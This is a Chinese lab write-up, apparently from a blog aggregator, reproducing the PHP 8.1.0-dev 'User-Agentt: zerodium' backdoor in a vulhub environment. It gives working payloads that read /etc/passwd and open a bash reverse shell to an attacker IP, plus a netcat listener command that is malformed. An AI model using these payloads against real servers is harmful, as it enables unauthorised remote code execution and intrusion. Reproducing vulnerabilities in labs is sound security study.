PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)

Posted bear27-x

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)相关的知识,希望对你有一定的参考价值。

漏洞介绍

  1. 关于漏洞:php 8.1.0-dev 后门远程命令执行漏洞

    PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。

    影响版本:PHP 8.1.0-dev

  2. 配置环境:

    靶机:centos8

    攻击机:kali

    其他:vulhub -->php–>8.1-backdoor

  3. 漏洞攻击思路:

    扫描端口,确定开启的服务,漏洞寻找,漏洞利用

信息收集

  1. nmap扫描端口

  1. 访问http://192.168.0.118:8080

    访问8080时显示如下hello world界面

    查看源码,检查元素没有发现有用信息,用burp抓包试试

  2. burp抓包

    burp抓包,发送至Repeater,Go一下,返回包中有 X-Powered-By: PHP/8.1.0-dev,得到了php版本号

  3. 查找漏洞

    百度一下 PHP/8.1.0漏洞,找到PHP-8.1.0-dev 后门命令执行漏洞

漏洞利用

  1. POC验证

    User-Agentt: zerodiumvar_dump(2*3); //或者User-Agentt: zerodiumsystem(“cat /etc/passwd”);

  2. 监听

    nc -lvp 192.168.0.118:8080

  3. 反弹shell

    User-Agentt: zerodiumsystem(“bash -c ‘exec bash -i >& /dev/tcp/192.168.0.116/6666 0>&1’”);

    反弹成功

以上是关于PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)的主要内容,如果未能解决你的问题,请参考以下文章

Web安全篇学习笔记4

复现2003方程式远程命令执行漏洞

PhpStudy后门漏洞实战复现

php 远程代码执行漏洞 怎么修复

bash远程命令执行漏洞 怎么修复

CTFshow刷题日记-WEB-PHPCVE(web311-315)包括PHP-fpm远程代码执行,PHPimap_open函数任意命令执行,PHP-CGI远程代码执行,XDebug 远程调试漏洞(代